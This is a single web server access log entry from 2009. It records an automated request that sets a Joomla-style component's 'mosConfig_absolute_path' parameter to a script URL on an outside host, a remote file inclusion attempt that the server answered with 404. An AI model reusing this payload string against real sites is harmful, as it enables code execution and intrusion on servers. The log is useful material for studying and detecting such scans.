72.51.42.92 - - [11/Sep/2009:02:01:17 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://super.gameshot.net/ps3/zboard/data/cok.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
